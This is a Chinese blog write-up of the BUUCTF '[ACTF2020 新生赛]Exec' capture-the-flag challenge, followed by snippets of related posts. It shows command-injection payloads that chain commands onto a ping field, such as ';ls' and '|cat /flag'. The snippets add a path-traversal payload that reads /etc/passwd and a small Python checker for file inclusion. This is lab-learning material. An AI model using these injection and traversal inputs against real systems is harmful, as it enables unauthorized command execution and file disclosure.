BUUCTF-Web-命令执行-[ACTF2020 新生赛]Exec

最新推荐文章于 2024-11-25 22:57:33 发布
最新推荐文章于 2024-11-25 22:57:33 发布
阅读量4.2k 收藏 1
点赞数 1
分类专栏: CTF竞赛 文章标签: 网络安全 web安全 php 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_42566218/article/details/123372258
版权

BUUCTF-Web-命令执行-[ACTF2020 新生赛]Exec

题目链接:BUUCTF
类型:命令注入
知识点:命令拼接符(||、;、&&…)

解题过程

这道题目比较简单,打开发现是一个ping命令执行页面,使用post接受参数

测试命令拼接符";"发现未进行过滤,拼接ls命令得到回显

  • target=127.0.0.1;ls

查看index.php源码发现目标未对参数进行任何过滤

  • target=127.0.0.1;cp index.php 1.txt

网页根目录未发现flag,这时可以尝试去/root目录或者根目录下找找,最后在根目录下找到flag,直接使用cat查看即可

  • cat /flag

    vYJh-1646794766588)]
BUUCTFWebExec命令执行漏洞)
qq_70434663的博客
03-02 1364
在根目录中我们发现有一个flag文件,猜测我们的flag就在里面,所以我们需要使用命令来读取flag文件的内容。命令大家可以在网上查看,这里使用的命令是127.0.0.1 & cat /flag(也可以使用127.0.0.1 | cat /flag)了解拼接符后我们先试一下查看目录,发现使用127.0.0.1 && ls执行不了,使用127.0.0.1 & ls有回显。在进入靶场后发现窗口ping,猜测可能是SQL注入,也有可能是命令执行漏洞。命令执行就用命令拼接符执行漏洞命令就行。
[ACTF2020 新生] Exec
Sweet_vinegar520的博客
10-28 767
本题可以直接去翻找文件目录,毕竟包含 flag 的文件不一定每次都直接叫做 flag。此处其实。
BUUCTF[ACTF2020 新生]Exec
stars的博客
11-01 501
文章目录 打开连接发现网站有个ping功能,测试一下 考虑到这里会存在命令执行漏洞,利用它拿到flag 在这里补充一些相关的管道符 1、|(就是按位或),直接执行|后面的语句 2、||(就是逻辑或),如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 3、&(就是按位与),&前面和后面命令都要执行,无论前面真假 4、&&(就是逻辑与),如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令 5、;(linux下有的,和&一样的作用) 查看根目录发现f
buuctf web题[ACTF2020 新生]Exec
qq_44740774的博客
09-25 315
buuctf web的[ACTF2020 新生]Exec
buuctf-write_shell(命令执行)
m0_62094846的博客
05-21 362
<?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ return $input; .
【CTF】buuctf web(一)——命令执行
m0_52923241的博客
07-26 3050
[ACTF2020 新生]Exec 抓包看看 得到信息:以post方式通过变量target传参
BUUCTF-Web题解(持续更新中)
2301_80281749的博客
11-25 2236
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件,于是得到flag:flag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flag:flag{fac64f95-3877-4f3e-9772-47bb8585b31a}
BUUCTF--WEB
书山有路勤为径,学海无涯苦作舟
06-28 1379
可以猜测,这个输入框是搜索当前数据库里的表id号应该,回显得数据就是表words里的两个字段id和data,但是我们flag在当前数据库的。他的后端既然能做到数字回显字母不回显,说明有一个 或 结构,而且不直接回显flag,但作为一道题目,from一定是from flag。mb_substr($page,n,m):返回page中从第n位开始,到n+m位字符串的值。再跳转到新的页面什么也没有就结束了,所以在这个页面,我们请点击抓包,就能发现他的秘密。内联函数:将指定的函数体插入并取代每一处调用该函数的地方。
BUUCTF-WEB
ccfly1012的博客
11-02 4074
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF - Web - 1
weixin_39505091的博客
07-20 835
堆叠注入是一种SQL注入技术,允许攻击者在单个SQL查询中执行多个语句。此时可以采用改表名的方式来查询,把words随便改成words1,然后把1919810931114514改成words,再把列名flag改成id,结合上面的1’ or 1=1#爆出表所有内容就可以查flag啦。查看另一个表的表结构,发现有 id 和 data 字段,猜想我们当前查询就是在这个表下进行的。发现过滤了很多字符,flag 字符串也被过滤了。其他命令的注入难免需要输入空格,需要尝试绕过空格。尝试注入,发现空格会被拦截,使用;
BUUCTF:[ACTF2020 新生]Exec
末初 · mochu7
10-20 382
题目地址:https://buuoj.cn/challenges#[ACTF2020%20%E6%96%B0%E7%94%9F%E8%B5%9B]Exec 命令执行,使用;或者|进行注入 在根目录发现flag,直接读取
buuctf-web-[ACTF2020 新生]Exec1
mlws1900的博客
07-30 259
cattac等命令也可以,/?代替/flag也可以,可以ls一下,就flag为四个字的文件。有回显,用管道符连接一下命令&|&&||(前面两个试过了可以,后面的没试过,应该也行)命令执行漏洞,和pikachu靶场的一样。先ping一下本地地址。.........
BUUCTF命令执行知识点总结
qq_49833809的博客
11-13 362
命令执行知识点总结
BUUCTF Web [ACTF2020 新生]Exec
热门推荐
wangyuxiang946的博客
10-27 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [ACTF2020 新生]Exec一、题目简介二、思路分析三、解题步骤1)遍历目录2)查看文件内容四、总结 一、题目简介 进入题目连接后,是一个ping的「功能」,我们输入ip地址或域名后可以使用ping命令「测试」网络的连通性 二、思路分析   &nbs.
BUUCTFWeb:[ACTF2020 新生]Exec
Pai_Space
02-11 7524
127.0.0.1 127.0.0.1 | ls 127.0.0.1 | ls / 127.0.0.1 | cat /flag
做题记录命令执行buuctfEasy Calc
zbbjya的博客
03-25 3684
题目Easy Calc 查看源代码 给提示url 还有 waf绕过 发现过滤了许多东西 查看根目录发现了flag然后我们将 用 file_get_contents() 函数先读取文件为字符串然后用 var_dump 显示字符串得到 flag 构造playload然后得到flag 题目总结 首先我们要发现是题目给的提示,当查看源代码的时候好好的去看,然后我们看到有一个waf绕过, 在不知道的情况下我们要去了解一下什么是waf绕过 然后打开php文件查看源码时命令执行的一种方式我们 根据提示开始分析看题目的
buuctf_Exec
qq_61968245的博客
12-19 951
0x01 题目链接 BUUCTF在线评测BUUCTF 是一个 CTF 竞和训练平台,为各位 CTF 选手提供真实题在线复现等服务。https://buuoj.cn/challenges 0x02 题目 打开题目就看到大大的PING,二话不说直接ping个本地ip 涉及知识点: 在命令执行的过程中,可以通过一些常用特殊字符来执行其他语句 ; //命令分割符,即当执行完第一个命令,继续执行下一个命令 | //管道 0x03 解题 那么尝试在当前文...
buuctf web入门 命令执行 逆向
weixin_74228275的博客
07-05 704
bin主要放置一些系统的必备执行档例如:cat、cp、chmod df、dmesg、gzip、kill、ls、mkdir、more、mount、rm、su、tar、base64等。通过post传参,传入cat flag.php,因为传入的文件一般都存放在tmp文件下,默认文件名为phpXXXXXX(后6个为随机的大小写字母)$((~$({_})))为-1,$((~$(())))$((~$(())))为-2,故可以通过这个构造出36。根据题意,需要构造出36,$(())值为0,因为~a+a=-1。
BUUCTF_Web_[ACTF2020 新生]Exec
阿刁〇的博客
07-31 229
BUUCTF_Web_[ACTF2020 新生]Exec 首先打开靶机 可以看出,这是一道有关命令执行的题 根据经验,可以尝试127.0.0.1;cat /flag ;cat /flag 127.0.0.1|cat /flag |cat /flag 127.0.0.1||cat /flag ||cat /flag 127.0.0.1&cat /flag &cat /flag 以上命令均可查询到flag 没有过滤的题,可以利用常见的管道命令符执行 |(按位或),直接执行|后面的语句
buuctf web [ACTF2020 新生]Include 1
最新发布
01-15
### 关于 BUUCTF ACTF2020 新生 Web Include 题目分析 #### 背景介绍 该题目属于Web安全领域中的文件包含漏洞利用。通过特定的URL参数绕过服务器端的安全检查,最终读取到目标文件的内容。 #### 技术细节解析 在本题中,攻击者可以控制`file`参数来指定要加载的文件路径。由于存在两层URL编码机制,使得原本受限的字符能够成功传递给PHP解释器处理: - `%253F`经过第一次解码变为`%3F` - 经第二次解码后成为问号(`?`),这有助于规避某些基于字符串匹配方式实现的简单防护措施[^1] 因此,当访问如下链接时: ``` http://url.to.target/?file=hint.php%253F/../../../../ffffllllaaaagggg ``` 实际上是在尝试从根目录向上回溯多个层级并请求名为`ffffllllaaaagggg`的目标文件。这种技巧常用于测试是否存在本地文件包含(Local File Inclusion, LFI)漏洞以及评估其严重程度。 #### 实际操作建议 为了验证上述理论,在实验环境中应当谨慎构建类似的payload,并确保只针对授权范围内的资源进行探索。同时注意观察返回的数据流特征变化情况,比如页面布局结构调整或是新增加了异常提示信息等现象。 ```python import requests target_url = "http://example.com/index.php" payload = "?file=hint.php%253F/../../../../etc/passwd" response = requests.get(target_url + payload) if b'root:x:' in response.content: print("[+] Potential Local File Inclusion vulnerability detected.") else: print("[-] No obvious signs of a vulnerable condition found.") ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值